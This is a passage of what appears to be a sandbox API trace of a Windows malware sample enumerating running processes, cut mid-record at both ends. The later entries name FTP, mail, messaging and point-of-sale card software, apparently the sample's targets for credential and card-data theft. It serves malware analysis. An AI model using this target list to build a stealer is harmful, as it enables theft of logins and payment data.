cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.736] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.739] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.741] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.743] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.745] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.748] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.750] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.752] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.754] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.756] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.758] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0151.760] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.762] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0151.765] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.767] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0151.769] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0151.771] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0151.775] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0151.778] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0151.780] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0151.782] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.784] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0151.787] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0151.789] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.791] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0151.793] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.795] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0151.797] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0151.802] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0151.804] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0151.806] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0151.808] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0151.810] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0151.815] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0151.818] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0151.820] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0151.822] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0151.824] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0151.826] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0151.828] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0151.830] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0151.833] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0151.835] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0151.837] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0151.839] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0151.841] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0151.843] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0151.845] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0151.848] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0151.857] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0151.860] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0151.863] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0151.865] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0151.923] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0151.929] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0151.931] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0151.934] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0151.937] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0151.939] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0151.942] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0151.944] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0151.947] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0151.956] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0151.959] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0151.962] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0151.964] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0151.966] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0151.969] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0151.972] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0151.974] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0151.977] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0151.979] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0151.982] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0151.984] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0151.987] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0151.989] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0151.994] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0151.997] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0151.999] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0152.001] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0152.004] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0152.006] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0152.009] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0152.011] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, 